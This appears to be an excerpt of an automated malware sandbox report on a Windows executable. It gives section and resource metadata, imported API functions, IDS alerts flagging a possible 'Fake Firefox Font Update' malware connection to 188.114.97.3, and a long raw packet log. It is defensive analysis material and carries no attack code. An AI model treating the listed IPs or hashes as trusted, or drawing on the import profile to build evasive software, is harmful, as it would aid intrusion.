.rsrc | 0x6d000 | 0x189ac | 0x18a00 | 768107f716c3d4350e9c7978a9a75946 | False | 0.6123790450507615 | data | 7.16247135144247 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x86000 | 0x3dfc | 0x3e00 | dd2c47fa48872886af4c9a2e5bd90ccc | False | 0.8097278225806451 | data | 6.794335469567533 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x6d2c8 | 0xaf05 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.00046869768999
RT_ICON | 0x781d0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | English | United States | 0.2670642418516769
RT_ICON | 0x7c3f8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.3201244813278008
RT_ICON | 0x7e9a0 | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 0 | English | United States | 0.3479289940828402
RT_ICON | 0x80408 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.3897748592870544
RT_ICON | 0x814b0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.4389344262295082
RT_ICON | 0x81e38 | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 0 | English | United States | 0.45290697674418606
RT_ICON | 0x824f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.6338652482269503
RT_MESSAGETABLE | 0x82958 | 0x2840 | data | English | United States | 0.28823757763975155
RT_GROUP_ICON | 0x85198 | 0x76 | data | English | United States | 0.7203389830508474
RT_VERSION | 0x85210 | 0x2c8 | data | English | United States | 0.47752808988764045
RT_MANIFEST | 0x854d8 | 0x4d2 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1174), with CRLF line terminators | English | United States | 0.47568881685575365
DLL | Import
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, InitiateSystemShutdownExW, GetUserNameW, RegQueryValueExW, RegDeleteValueW, CloseEventLog, OpenEventLogW, ReportEventW, ConvertStringSecurityDescriptorToSecurityDescriptorW, DecryptFileW, CreateWellKnownSid, InitializeAcl, SetEntriesInAclW, ChangeServiceConfigW, CloseServiceHandle, ControlService, OpenSCManagerW, OpenServiceW, QueryServiceStatus, SetNamedSecurityInfoW, CheckTokenMembership, AllocateAndInitializeSid, SetEntriesInAclA, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegSetValueExW, RegQueryInfoKeyW, RegEnumValueW, RegEnumKeyExW, RegDeleteKeyW, RegCreateKeyExW, GetTokenInformation, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextW, QueryServiceConfigW
USER32.dll | PeekMessageW, PostMessageW, IsWindow, WaitForInputIdle, PostQuitMessage, GetMessageW, TranslateMessage, MsgWaitForMultipleObjects, PostThreadMessageW, GetMonitorInfoW, MonitorFromPoint, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, CreateWindowExW, UnregisterClassW, RegisterClassW, DefWindowProcW, DispatchMessageW
OLEAUT32.dll | VariantInit, SysAllocString, VariantClear, SysFreeString
GDI32.dll | DeleteDC, DeleteObject, SelectObject, StretchBlt, GetObjectW, CreateCompatibleDC
SHELL32.dll | CommandLineToArgvW, SHGetFolderPathW, ShellExecuteExW
ole32.dll | CoUninitialize, CoInitializeEx, CoInitialize, StringFromGUID2, CoCreateInstance, CoTaskMemFree, CLSIDFromProgID, CoInitializeSecurity
KERNEL32.dll | GetCommandLineA, GetCPInfo, GetOEMCP, CloseHandle, CreateFileW, GetProcAddress, LocalFree, HeapSetInformation, GetLastError, GetModuleHandleW, FormatMessageW, lstrlenA, lstrlenW, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, Sleep, GetLocalTime, GetModuleFileNameW, ExpandEnvironmentStringsW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, GetFullPathNameW, CompareStringW, GetCurrentProcessId, WriteFile, SetFilePointer, LoadLibraryW, GetSystemDirectoryW, CreateFileA, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, GetProcessHeap, FindClose, GetCommandLineW, GetCurrentDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, FindFirstFileW, FindNextFileW, MoveFileExW, GetCurrentProcess, GetCurrentThreadId, InitializeCriticalSection, DeleteCriticalSection, ReleaseMutex, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CreateProcessW, GetVersionExW, VerSetConditionMask, FreeLibrary, EnterCriticalSection, LeaveCriticalSection, GetSystemTime, GetNativeSystemInfo, GetModuleHandleExW, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetEnvironmentStringsW, VerifyVersionInfoW, GetVolumePathNameW, GetDateFormatW, GetUserDefaultUILanguage, GetSystemDefaultLangID, GetUserDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, DuplicateHandle, InterlockedExchange, InterlockedCompareExchange, LoadLibraryExW, CreateEventW, ProcessIdToSessionId, OpenProcess, GetProcessId, WaitForSingleObject, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, CreateThread, GetExitCodeThread, SetEvent, WaitForMultipleObjects, InterlockedIncrement, InterlockedDecrement, ResetEvent, SetEndOfFile, SetFileTime, LocalFileTimeToFileTime, DosDateTimeToFileTime, CompareStringA, GetExitCodeProcess, SetThreadExecutionState, CopyFileExW, MapViewOfFile, UnmapViewOfFile, CreateMutexW, CreateFileMappingW, GetThreadLocale, IsValidCodePage, FindFirstFileExW, FreeEnvironmentStringsW, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DecodePointer, WriteConsoleW, GetModuleHandleA, GlobalAlloc, GlobalFree, GetFileSizeEx, CopyFileW, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, SystemTimeToFileTime, GetSystemInfo, VirtualProtect, VirtualQuery, GetComputerNameW, SetCurrentDirectoryW, GetFileType, GetACP, ExitProcess, GetStdHandle, InitializeCriticalSectionAndSpinCount, SetLastError, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RaiseException, LoadLibraryExA
RPCRT4.dll | UuidCreate
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-07T13:18:55.124619+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49967 | 188.114.97.3 | 443 | TCP
2025-01-07T13:18:56.443341+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49976 | 188.114.97.3 | 443 | TCP
2025-01-07T13:18:57.293419+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49977 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:30.283450+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50088 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:31.679881+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50089 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:32.466637+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50090 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:32.706134+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50091 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:33.599585+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50092 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:33.815698+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50093 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:34.654268+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50094 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:34.840859+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50095 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:36.070306+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50096 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:36.332508+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50097 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:37.199026+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50098 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:37.575118+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50099 | 188.114.97.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.795491934 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.795511007 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.795521975 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.795564890 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.796318054 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.796372890 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.796405077 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.796416044 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.796421051 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.796467066 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.797005892 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.797063112 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.797085047 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.797128916 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.797133923 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.797174931 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.869865894 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.874905109 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.874958992 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.874978065 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.882863045 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.882932901 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.882939100 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.882977009 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.883033037 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.883043051 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.883088112 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.883790016 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.883843899 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.883850098 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.883891106 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.883919001 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.883965015 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.883970976 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.884007931 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.884053946 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.884160995 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.884169102 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.884186029 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.884190083 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.958719969 CET49976443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.958765030 CET44349976188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.958825111 CET49976443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.959135056 CET49976443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.959146976 CET44349976188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.443231106 CET44349976188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.443341017 CET49976443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.444704056 CET49976443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.444714069 CET44349976188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.444967985 CET44349976188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.449350119 CET49976443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.449376106 CET49976443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.449379921 CET44349976188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.786214113 CET44349976188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.786812067 CET44349976188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.786935091 CET49976443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.787241936 CET49976443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.787256002 CET44349976188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.787269115 CET49976443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.787276030 CET44349976188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.834444046 CET49977443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.834477901 CET44349977188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.834631920 CET49977443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.834917068 CET49977443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:56.834929943 CET44349977188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:57.293324947 CET44349977188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:57.293418884 CET49977443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:57.294718981 CET49977443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:57.294728041 CET44349977188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:57.294972897 CET44349977188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:57.295937061 CET49977443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:57.295965910 CET49977443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:57.295981884 CET44349977188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:57.590502977 CET44349977188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:57.590575933 CET44349977188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:57.590676069 CET49977443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:57.590802908 CET49977443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:57.590802908 CET49977443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:57.590823889 CET44349977188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.266722918 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.306638956 CET50023443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.306696892 CET4435002323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.306859016 CET50023443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.307527065 CET50023443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.307540894 CET4435002323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.410186052 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.410228968 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.410317898 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.410341978 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.413009882 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.413048983 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.413057089 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.419265985 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.419322014 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.419332027 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.425596952 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.425695896 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.425709009 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.432029009 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.432090044 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.432099104 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.438093901 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.438164949 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.438174009 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.444406033 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.444489002 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.444497108 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.456367970 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.456429005 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.456438065 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.458306074 CET50024443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.458343983 CET44350024172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.458575964 CET50024443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.458739042 CET50025443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.458776951 CET44350025172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.458823919 CET50025443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.459433079 CET50024443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.459446907 CET44350024172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.459696054 CET50025443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.459709883 CET44350025172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.496841908 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.496951103 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.496965885 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.499310970 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.499375105 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.499385118 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.505680084 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.505739927 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.505747080 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.505832911 CET44350019172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.506154060 CET50019443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.506174088 CET44350019172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.506515026 CET44350019172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.506846905 CET50019443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.506916046 CET44350019172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.510600090 CET44350020172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.510802984 CET50020443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.510832071 CET44350020172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.511149883 CET44350020172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.511563063 CET50020443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.511617899 CET44350020172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.511913061 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.511955976 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.511961937 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.518317938 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.518383026 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.518389940 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.524744034 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.524902105 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.524909973 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.530744076 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.530798912 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.530810118 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.536957979 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.537058115 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.537089109 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.543334961 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.674479961 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.674489021 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.674546957 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.677284956 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.680237055 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.680270910 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.680279016 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.680286884 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.680335999 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.682274103 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.684340000 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.684387922 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.684395075 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.686433077 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.686463118 CET44350016142.250.185.129192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.686496019 CET50016443192.168.2.7142.250.185.129
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:10.686506033 CET44350016142.250.185.129192.168.2.7
